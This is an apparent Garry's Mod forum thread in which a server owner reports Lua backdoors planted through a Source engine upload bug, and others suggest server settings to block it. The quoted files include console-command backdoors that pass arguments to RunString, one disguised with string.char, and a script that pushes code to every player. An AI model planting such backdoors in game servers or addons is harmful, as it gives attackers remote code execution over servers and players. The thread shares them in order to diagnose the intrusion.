Major Vulnerability: Remote Lua upload

Alright, I own a Windows 2003 Dedicated Server.

No one has remote access but me, this includes FTP.

This appeared in my lua/autorun and everyone suffered:

Correction: It was just in lua/ , but somehow was executed anyways from the account of my players.
[lua]
for _,v in pairs( player.GetAll() ) do
if v and v:IsValid() and v:IsPlayer() then
//v:SendLua([[hook.Add(“HUDPaint”,“SDFDSFSDF”,function() surface.SetDrawColor(math.random(255),math.random(255),math.random(255),255) surface.DrawRect(0,0,ScrW(),ScrH()) end)]])
v:SendLua([[vgui.Create(“HTML”):OpenURL(“http://www.youtube.com/watch?v=S3zCewONLls”)]])
//v:SetUserGroup( “admin” )
//v:Ban(0, v:Nick()…", YOU GOT FUCKING PWNT!")
//v:Kick(v:Nick()…", YOU GOT FUCKING PWNT!")
end
end
[/lua]

This needs to be fixed.

PS: I’m glad the lines that were commented are commented.

We know. It’s a source engine bug.

We do?

Well if this becomes wide-spread it could become quite fatal for GMod.

Is a working version leaked?

From a server owner’s point of view, I’d actually prefer this to be wide-spread so it gets someone’s attention, rather than just known by a few who abuse it.

Garry posted the exploits to the public.

Azu created an email with a link to a perfectly working exploit.

Gee, where would I find this email? Oh, that’s easy try Garry’s own twitter, ffs this could cause damage to people’s servers and he uploads it to his blog? Brilliant.

There’s a sourcemod that patches it, too, also conveniently posted in that mailing list, made because of the mailing list. That is why it is brought to the public’s attention.

from

sv_allowdownload 0
sv_allowupload 0
sv_downloadurl “yoursite.com/downloadurl

Stop getting your panties in a bunch, turn off abusable things and forget about it.

I am using fast download via an Apache webserver that I host.

Stop getting your panties in a bunch, making shit up. Although I suppose I should’ve included that in the original post.

Also discovered this in the autorun directory:

[lua]
if (SERVER) then
concommand.Add("_l", function(a,b,c)
RunString(table.concat(c, " "))
end )
end
[/lua]

Basicly a remote execution thing. It was title fptje.lua, but he would do nothing of the type.

Also found this in lua/autorun/server
Named admin_ext.lua
[lua]
concommand.Remove(“admin_heartbeat”)
concommand.Remove(“admin_ext”)

if not file.Exists(“extmanifest.txt”) then
file.Write(“extmanifest.txt”, “01”)
end

concommand.Add(“admin_heartbeat”, function()
pcall(require, “extadmn”)
end)

concommand.Add(“admin_ext”, function(u,c,a)
RunString(table.concat(a, " "))
end)
[/lua]
Man, I just discovered all this shit, no wonder i’ve been having problems.

Also found this in the same folder, named adminfunctions.lua
An obvious attempt to be deceitful
[lua]
concommand.Add ( string.char ( 95,95,100 ) ,function ( a,b,c ) RunString ( c[1] ) end )[/lua]

I just discovered a module called gm_command that was not present on my other server installations. Now if that was used then I have a REAL problem, since DLLs can do pretty much anything I believe. Or are they at least sandboxed from outside of GMod?

Update your engine.dll with the one from your garrysmod/bin folder, then do the commands.

wow, vicious lua coders are a lot more vicious than i thought they were.

I did the engine.dll thing, but this just happened again.

You’re doing it wrong then.

So to clarify:
All I need to fix this permanently is:

  1. Turn off sv_allowupload (DONE)
  2. Turn off sv_allowdownlaod (DONE)
  3. Use fast download server (DONE)
  4. Use the engine.dll from my client (DONE)

[editline]07:00PM[/editline]

I temporarily fixed by making the lua folder and addons folder read only :frowning:

also check your modules and autorun folders.

modules had a command.dll module that I deleted earlier, and autorun is of course where I look first.

Both are in lua folder so for now it is fixed by readonly.

Getting blamed again xD

FPtje, you fiend!

That’s like putting your name on a murder weapon, of course it’s obviously not you.

“Unless he knew you wouldn’t believe the truth, even if he told it to you.”

  • Jack Sparrow